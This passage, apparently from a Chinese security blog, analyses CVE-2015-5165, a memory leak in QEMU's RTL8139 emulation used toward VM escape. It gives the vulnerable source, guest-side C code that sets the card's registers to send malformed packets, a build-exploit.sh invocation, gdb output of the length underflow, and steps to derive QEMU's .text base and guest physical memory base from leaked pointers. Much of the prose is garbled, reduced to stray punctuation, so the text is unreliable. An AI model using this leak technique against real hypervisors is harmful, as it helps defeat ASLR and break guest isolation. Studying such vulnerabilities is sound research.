> < / pre > < / td > < / tr > < / table > < / figure >
< h2 id = "3-Memory-Leak-Exploitation" > < a href = "#3-Memory-Leak-Exploitation" class = "headerlink" title = "3 Memory Leak Exploitation" > < / a > 3 Memory Leak Exploitation< / h2 > < p > 接下来, ( ) < / p >
< ol >
< li > .text段的基地址, < / li >
< li > 为Guest分配的物理内存的基地址, < / li >
< / ol >
< h3 id = "3-1-The-vulnerable-Code" > < a href = "#3-1-The-vulnerable-Code" class = "headerlink" title = "3.1 The vulnerable Code" > < / a > 3.1 The vulnerable Code< / h3 > < p > REALTEK网卡支持两种 接收/发送 操作模式: , , < / p >
< p > 该漏洞存在于hw/net/rtl8139.c的 rtl8139_cplus_transmit_one 函数中:< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > /* ip packet header */< / span > < br > < span class = "line" > ip_header *ip = NULL;< / span > < br > < span class = "line" > int hlen = 0;< / span > < br > < span class = "line" > uint8_t ip_protocol = 0;< / span > < br > < span class = "line" > uint16_t ip_data_len = 0;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > uint8_t *eth_payload_data = NULL;< / span > < br > < span class = "line" > size_t eth_payload_len = 0;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));< / span > < br > < span class = "line" > if (proto == ETH_P_IP)< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > DPRINTF(" +++ C+ mode has IP packet\n" );< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > /* not aligned */< / span > < br > < span class = "line" > eth_payload_data = saved_buffer + ETH_HLEN;< / span > < br > < span class = "line" > eth_payload_len = saved_size - ETH_HLEN;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ip = (ip_header*)eth_payload_data;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { < / span > < br > < span class = "line" > DPRINTF(" +++ C+ mode packet has bad IP version %d " < / span > < br > < span class = "line" > " expected %d\n" , IP_HEADER_VERSION(ip),< / span > < br > < span class = "line" > IP_HEADER_VERSION_4);< / span > < br > < span class = "line" > ip = NULL;< / span > < br > < span class = "line" > } else { < / span > < br > < span class = "line" > hlen = IP_HEADER_LENGTH(ip);< / span > < br > < span class = "line" > ip_protocol = ip-> ip_p;< / span > < br > < span class = "line" > **ip_data_len** **= be16_to_cpu(ip-> ip_len) - hlen;**< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > IP头包含两个字段hlen和ip-> ip_len, ( , ) , ( ) , > = hlen 。 由于ip_data_len字段被编码为unsigned short int, < / p >
< p > 更精确地讲, , , : < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > int **tcp_data_len** **= ip_data_len - tcp_hlen;**< / span > < br > < span class = "line" > int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > int is_last_frame = 0;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len;< / span > < br > < span class = "line" > tcp_send_offset += tcp_chunk_size) { < / span > < br > < span class = "line" > uint16_t chunk_size = tcp_chunk_size;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > /* check if this is the last frame */< / span > < br > < span class = "line" > if (tcp_send_offset + tcp_chunk_size > = tcp_data_len) { < / span > < br > < span class = "line" > is_last_frame = 1;< / span > < br > < span class = "line" > chunk_size = tcp_data_len - tcp_send_offset;< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > memcpy(data_to_checksum, saved_ip_header + 12, 8);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > if (tcp_send_offset) { < / span > < br > < span class = "line" > memcpy((uint8_t*)p_tcp_hdr + tcp_hlen,< / span > < br > < span class = "line" > (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset,< / span > < br > < span class = "line" > chunk_size);< / span > < br > < span class = "line" > } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > /* more code follows */< / span > < br > < span class = "line" > } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 因此, ( ) , , < / p >
< h3 id = "3-2-Setting-up-the-Card" > < a href = "#3-2-Setting-up-the-Card" class = "headerlink" title = "3.2 Setting up the Card" > < / a > 3.2 Setting up the Card< / h3 > < p > 为了发送格式错误的数据包并读取泄漏的数据, , , < / p >
< p > 下图显示了RTL8139寄存器。 我们将不详述所有这些内容,而是仅详述与我们的利用相关的那些内容:< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > +---------------------------+----------------------------+< / span > < br > < span class = "line" > 0x00 | MAC0 | MAR0 |< / span > < br > < span class = "line" > +---------------------------+----------------------------+< / span > < br > < span class = "line" > 0x10 | TxStatus0 |< / span > < br > < span class = "line" > +--------------------------------------------------------+< / span > < br > < span class = "line" > 0x20 | TxAddr0 |< / span > < br > < span class = "line" > +-------------------+-------+----------------------------+< / span > < br > < span class = "line" > 0x30 | RxBuf |ChipCmd| |< / span > < br > < span class = "line" > +-------------+------+------+----------------------------+< / span > < br > < span class = "line" > 0x40 | TxConfig | RxConfig | ... |< / span > < br > < span class = "line" > +-------------+-------------+----------------------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > | skipping irrelevant registers |< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > +---------------------------+--+------+------------------+< / span > < br > < span class = "line" > 0xd0 | ... | |TxPoll| ... |< / span > < br > < span class = "line" > +-------+------+------------+--+------+--+---------------+< / span > < br > < span class = "line" > 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... |< / span > < br > < span class = "line" > +-------+------+------------+------------+---------------+< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< ul >
< li > < strong > TxConfig:< / strong > 启用/禁用Tx标志, ( ) , ( ) < / li >
< li > < strong > RxConfig:< / strong > 启用/禁用Rx标志, ( ) , ( ) < / li >
< li > < strong > CpCmd:< / strong > C+命令寄存器, , ( ) , ( ) < / li >
< li > < strong > TxAddr0:< / strong > Tx描述符表的物理内存地址。< / li >
< li > < strong > RxRingAddrLO:< / strong > Rx描述符表的低32位物理内存地址。< / li >
< li > < strong > RxRingAddrHI:< / strong > Rx描述符表的高32位物理内存地址。< / li >
< li > < strong > TxPoll:< / strong > 告诉网卡检查Tx描述符。< / li >
< / ul >
< p > Rx/Tx描述符 由以下结构定义, ( ) , < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > struct rtl8139_desc { < / span > < br > < span class = "line" > uint32_t dw0;< / span > < br > < span class = "line" > uint32_t dw1;< / span > < br > < span class = "line" > uint32_t **buf_lo**;< / span > < br > < span class = "line" > uint32_t **buf_hi**;< / span > < br > < span class = "line" > } ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 网卡通过in< em > () out< / em > ()原语( ) , < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > #define RTL8139_PORT 0xc000< / span > < br > < span class = "line" > #define RTL8139_BUFFER_SIZE 1500< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > struct rtl8139_desc desc;< / span > < br > < span class = "line" > void *rtl8139_tx_buffer;< / span > < br > < span class = "line" > uint32_t phy_mem;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE);< / span > < br > < span class = "line" > phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > memset(& desc, 0, sizeof(struct rtl8139_desc));< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > desc-> dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN |< / span > < br > < span class = "line" > CP_TX_IPCS | CP_TX_TCPCS;< / span > < br > < span class = "line" > desc-> dw0 += RTL8139_BUFFER_SIZE;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > desc.buf_lo = phy_mem;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > iopl(3);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > outl(TxLoopBack, RTL8139_PORT + TxConfig);< / span > < br > < span class = "line" > outl(AcceptMyPhys, RTL8139_PORT + RxConfig);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd);< / span > < br > < span class = "line" > outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd);< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > outl(phy_mem, RTL8139_PORT + TxAddr0);< / span > < br > < span class = "line" > outl(0x0, RTL8139_PORT + TxAddr0 + 0x4);< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h3 id = "3-3-Exploit" > < a href = "#3-3-Exploit" class = "headerlink" title = "3.3 Exploit" > < / a > 3.3 Exploit< / h3 > < p > phrack随附的源代码中提供了完整的利用( ) ( , ) < br > cve-2015-5165.c依赖qemu.h头文件中的函数偏移地址, < a href = "https://github.com/jiayy/android_vuln_poc-exp/blob/master/EXP-2015-7504/build-exploit.sh" target = "_blank" rel = "noopener" > build-exploit.sh< / a > 来进行计算。< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > ./build-exploit.sh ' /home/han/VMescape/qemu/bin/debug/native/x86_64-softmmu/qemu-system-x86_64' < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 该漏洞利用程序在网卡上配置所需的寄存器, , , < br > 通过对qemu运行程序下断点, , , ( < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > (gdb) b rtl8139.c:2173< / span > < br > < span class = "line" > Breakpoint 1 at 0x55a5ef757b03: file /home/han/VMescape/qemu/hw/net/rtl8139.c, line 2173.< / span > < br > < span class = "line" > (gdb) c< / span > < br > < span class = "line" > Continuing.< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > Thread 3 " qemu-system-x86" hit Breakpoint 1, rtl8139_cplus_transmit_one (s=0x55a5f26ecfe0)< / span > < br > < span class = "line" > at /home/han/VMescape/qemu/hw/net/rtl8139.c:2173< / span > < br > < span class = "line" > 2173 if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) { < / span > < br > < span class = "line" > (gdb) p/x ip< / span > < br > < span class = "line" > $1 = 0x7ff7d4278b6e< / span > < br > < span class = "line" > (gdb) p/x *ip< / span > < br > < span class = "line" > $2 = { ip_ver_len = 0x45, ip_tos = 0x0, ip_len = 0x1300, ip_id = 0xadde, ip_off = 0x40, ip_ttl = 0x40, ip_p = 0x6,< / span > < br > < span class = "line" > ip_sum = 0xadde, ip_src = 0x10108c0, ip_dst = 0x201a8c0} < / span > < br > < span class = "line" > (gdb) n< / span > < br > < span class = "line" > [Thread 0x7ff7e131f700 (LWP 56763) exited]< / span > < br > < span class = "line" > 2179 hlen = IP_HEADER_LENGTH(ip);< / span > < br > < span class = "line" > (gdb) n< / span > < br > < span class = "line" > 2180 ip_protocol = ip→ip_p;< / span > < br > < span class = "line" > (gdb) p/x hlen< / span > < br > < span class = "line" > $5 = 0x14< / span > < br > < span class = "line" > (gdb) n< / span > < br > < span class = "line" > 2181 ip_data_len = be16_to_cpu(ip-> ip_len) - hlen;< / span > < br > < span class = "line" > (gdb) n< / span > < br > < span class = "line" > 2185 if (ip)< / span > < br > < span class = "line" > (gdb) p/x ip_data_len< / span > < br > < span class = "line" > **$7 = 0xffff**< / span > < br > < span class = "line" > (gdb) b rtl8139.c:2231< / span > < br > < span class = "line" > Breakpoint 2 at 0x55a5ef757d42: file /home/han/VMescape/qemu/hw/net/rtl8139.c, line 2231.< / span > < br > < span class = "line" > (gdb) c< / span > < br > < span class = "line" > Continuing.< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > Thread 3 " qemu-system-x86" hit Breakpoint 2, rtl8139_cplus_transmit_one (s=0x55a5f26ecfe0)< / span > < br > < span class = "line" > at /home/han/VMescape/qemu/hw/net/rtl8139.c:2231< / span > < br > < span class = "line" > 2231 int tcp_data_len = ip_data_len - tcp_hlen;< / span > < br > < span class = "line" > (gdb) n< / span > < br > < span class = "line" > 2232 int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;< / span > < br > < span class = "line" > (gdb) p/x tcp_data_len< / span > < br > < span class = "line" > **$8 = 0xffeb**< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 虚拟机内部的用户进程通过读取收包队列的数据包就可以知道被泄露的那块 qemu 内存区的内容。在分析泄漏的数据时, , < strong > get/set/resolve/release< / strong > < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > typedef struct ObjectProperty< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > gchar *name;< / span > < br > < span class = "line" > gchar *type;< / span > < br > < span class = "line" > gchar *description;< / span > < br > < span class = "line" > ObjectPropertyAccessor *get;< / span > < br > < span class = "line" > ObjectPropertyAccessor *set;< / span > < br > < span class = "line" > ObjectPropertyResolve *resolve;< / span > < br > < span class = "line" > ObjectPropertyRelease *release;< / span > < br > < span class = "line" > void *opaque;< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > QTAILQ_ENTRY(ObjectProperty) node;< / span > < br > < span class = "line" > } ObjectProperty;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > QEMU遵循对象模型来管理设备, , , , : < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > object_property_add_bool(OBJECT(mr), " may-overlap" ,< / span > < br > < span class = "line" > memory_region_get_may_overlap,< / span > < br > < span class = "line" > NULL, /* memory_region_set_may_overlap */< / span > < br > < span class = "line" > & error_abort);< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > RTL8139网卡设备仿真器在堆上保留了64 KB的空间以重组数据包。 该分配的缓冲区很可能把释放掉的object properties的内存占位了。< / p >
< p > 在我们的漏洞利用中, , ( ) , ( ) < br > 即使这些地址受ASLR约束, < strong > .text节的基地址< / strong > 。< / p >
< blockquote >
< p > 0) 从 qemu-system-x86_64 二进制文件里搜索上述 4 类符号的所有静态地址, 如 < strong > property_get_bool< / strong > 等符号的地址< / p >
< / blockquote >
< blockquote >
< p > 1) 在读回来的 IP 包的数据里搜索值等于 0x60 的内存 ptr, < strong > qemu_get_leaked_chunk< / strong > < / p >
< / blockquote >
< blockquote >
< p > 2) 在 1 搜索到的内存上匹配 0 收集到的 < strong > get/set/resolve/release< / strong > 这几种符号的静态地址, 匹配方式为页内偏移相等, 如果匹配到, 认为就是 struct ObjectProperty 对象, 对应的函数是 < strong > qemu_get_leaked_object_property< / strong > < / p >
< / blockquote >
< blockquote >
< p > 3) 在 2 搜索的基础上, 用 < strong > object-> get/set/resolve/release< / strong > 的实际地址减去静态编译里算出来的 offset, 得到 .text 加载的地址< / p >
< / blockquote >
< p > 实际上, ( ) , < br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_30.png" alt > < br > 我们还注意到, , < strong > 物理内存的起始地址。< / strong > < / p >
< blockquote >
< p > 总结: , ( ) ( ) < / p >
< / blockquote >
< h3 id = "3-4-遇到的几个问题" > < a href = "#3-4-遇到的几个问题" class = "headerlink" title = "3.4 遇到的几个问题" > < / a > 3.4 遇到的几个问题< / h3 > < ol >
< li > phrack提供的build-exploit.sh, 它是一个工具脚本,用来获取一些符号的(相对)地址。< a href = "http://www.phrack.org/papers/vm-escape-qemu-case-study.html" target = "_blank" rel = "noopener" > 原始的< / a > build-exploit.sh 获取 plt 段是通过下面的命令行:< / li >
< li > < code > plt**=**$(readelf -S $binary | grep plt | tail -n 1 | awk ' {print $2}' )< / code > < / li >
< / ol >
< p > 这样获取到的是 .plt.got 段,在我的环境里, mprotect 等系统函数符号没有在 .plt.got 这个段,而是在 .plt 这个段。因此替换如下:< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > #plt=$(readelf -S $binary | grep plt | tail -n 1 | awk ' { print $2} ' )< / span > < br > < span class = "line" > plt=.plt< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< ol >
< li > Phrack 文章提供的 Exploit 代码中搜索的地址是PHY_MEM + 0x78, , < code > uint64_t< / code > 类型的数据 < code > 0x00007FXXYYZZZZZZ< / code > ,其中 < code > 7FXXYY< / code > 出现次数最多的数据,就是 QEMU 虚拟机物理内存的结束地址;修改之后成功获得物理地址< / li >
< / ol >
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_31.png" width = "50%" height = "50%" > < / p >
< p > 通过 gdb 调试验证结果正确性:< / p >
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1618050992/VMescape/image_32.png" width = "50%" height = "50%" > < / p >
< h2 id = "ref" > < a href = "#ref" class = "headerlink" title = "ref" > < / a > ref< / h2 > < p > < a href = "http://jiayy.me/2019/04/15/CVE-2015-5165-7504/" target = "_blank" rel = "noopener" > http://jiayy.me/2019/04/15/CVE-2015-5165-7504/< / a > < br > < a href = "http://jiayy.me/2019/04/15/CVE-2015-5165-7504/#cve-2015-5165-exp" target = "_blank" rel = "noopener" > http://jiayy.me/2019/04/15/CVE-2015-5165-7504/#cve-2015-5165-exp< / a > < br > < a href = "https://programlife.net/2020/06/30/cve-2015-5165-qemu-rtl8139-vulnerability-analysis/" target = "_blank" rel = "noopener" > https://programlife.net/2020/06/30/cve-2015-5165-qemu-rtl8139-vulnerability-analysis/< / a > < / p >
< / div >
< div >
< div style = "padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;" >
< div > 您的支持将鼓励我继续创作!< / div >
< button id = "rewardButton" disable = "enable" onclick = "var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}" >
< span > 打赏< / span >
< / button >
< div id = "QR" style = "display: none;" >
< div id = "wechat" style = "display: inline-block" >
< img id = "wechat_qr" src = "/images/Wechatpay.png" alt = "Cool-Y 微信支付" >
< p > 微信支付< / p >
< / div >
< div id = "alipay" style = "display: inline-block" >
< img id = "alipay_qr" src = "/images/Alipay.png" alt = "Cool-Y 支付宝" >
< p > 支付宝< / p >
< / div >
< / div >
< / div >
< / div >
2021-04-10 12:03:10 +00:00
< div >
< ul class = "post-copyright" >
< li class = "post-copyright-author" >
< strong > 本文作者:< / strong >
Cool-Y
< / li >
< li class = "post-copyright-link" >
< strong > 本文链接:< / strong >
< a href = "https://cool-y.github.io/2021/04/10/vm-escape1/" title = "VM escape-QEMU Case Study" > https://cool-y.github.io/2021/04/10/vm-escape1/< / a >
< / li >
< li class = "post-copyright-license" >
< strong > 版权声明: < / strong >
本博客所有文章除特别声明外,均采用 < a href = "https://creativecommons.org/licenses/by-nc-sa/3.0/" rel = "external nofollow" target = "_blank" > CC BY-NC-SA 3.0< / a > 许可协议。转载请注明出处!
< / li >
< / ul >
< / div >
2021-04-10 10:53:27 +00:00
< footer class = "post-footer" >
< div class = "post-tags" >
< a href = "/tags/CVE/" rel = "tag" > # CVE< / a >
< a href = "/tags/QEMU/" rel = "tag" > # QEMU< / a >
< a href = "/tags/信息泄露/" rel = "tag" > # 信息泄露< / a >
< / div >
2021-04-10 19:19:48 +00:00
< div class = "post-widgets" >
< div id = "needsharebutton-postbottom" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
< / div >
2021-04-10 10:53:27 +00:00
< div class = "post-nav" >
< div class = "post-nav-next post-nav-item" >
< a href = "/2021/03/02/DIR-802-OS-Command-Injection/" rel = "next" title = "DIR-802 OS Command Injection" >
< i class = "fa fa-chevron-left" > < / i > DIR-802 OS Command Injection
< / a >
< / div >
< span class = "post-nav-divider" > < / span >
< div class = "post-nav-prev post-nav-item" >
< / div >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
2021-04-10 12:37:40 +00:00
< div class = "comments" id = "comments" >
< div id = "gitalk-container" > < / div >
< / div >
2021-04-10 10:53:27 +00:00
< / div >
< div class = "sidebar-toggle" >
< div class = "sidebar-toggle-line-wrap" >
< span class = "sidebar-toggle-line sidebar-toggle-line-first" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-middle" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-last" > < / span >
< / div >
< / div >
< aside id = "sidebar" class = "sidebar" >
2021-04-10 20:13:11 +00:00
< div id = "sidebar-dimmer" > < / div >
2021-04-10 10:53:27 +00:00
< div class = "sidebar-inner" >
< ul class = "sidebar-nav motion-element" >
< li class = "sidebar-nav-toc sidebar-nav-active" data-target = "post-toc-wrap" >
文章目录
< / li >
< li class = "sidebar-nav-overview" data-target = "site-overview-wrap" >
站点概览
< / li >
< / ul >
< section class = "site-overview-wrap sidebar-panel" >
< div class = "site-overview" >
< div class = "site-author motion-element" itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< img class = "site-author-image" itemprop = "image" src = "/images/avatar.png" alt = "Cool-Y" >
< p class = "site-author-name" itemprop = "name" > Cool-Y< / p >
2021-04-10 20:10:04 +00:00
< p class = "site-description motion-element" itemprop = "description" > Juice is temporary but Sauce is forever< / p >
2021-04-10 10:53:27 +00:00
< / div >
< nav class = "site-state motion-element" >
< div class = "site-state-item site-state-posts" >
< a href = "/archives/" >
< span class = "site-state-item-count" > 30< / span >
< span class = "site-state-item-name" > 日志< / span >
< / a >
< / div >
< div class = "site-state-item site-state-categories" >
< a href = "/categories/index.html" >
< span class = "site-state-item-count" > 7< / span >
< span class = "site-state-item-name" > 分类< / span >
< / a >
< / div >
< div class = "site-state-item site-state-tags" >
< a href = "/tags/index.html" >
< span class = "site-state-item-count" > 55< / span >
< span class = "site-state-item-name" > 标签< / span >
< / a >
< / div >
< / nav >
< div class = "links-of-author motion-element" >
< span class = "links-of-author-item" >
< a href = "https://github.com/Cool-Y" target = "_blank" title = "GitHub" >
< i class = "fa fa-fw fa-github" > < / i > GitHub< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "mailto:cool.yim@whu.edu.cn" target = "_blank" title = "E-Mail" >
< i class = "fa fa-fw fa-envelope" > < / i > E-Mail< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "https://www.instagram.com/yan__han/" target = "_blank" title = "Instagram" >
< i class = "fa fa-fw fa-instagram" > < / i > Instagram< / a >
< / span >
< / div >
< div id = "music163player" >
2021-04-10 12:03:10 +00:00
< iframe frameborder = "no" border = "0" marginwidth = "0" marginheight = "0" width = "330" height = "110" src = "//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90" > < / iframe >
2021-04-10 10:53:27 +00:00
< / div >
< / div >
< / section >
<!-- noindex -->
< section class = "post-toc-wrap motion-element sidebar-panel sidebar-panel-active" >
< div class = "post-toc" >
2021-04-10 12:03:10 +00:00
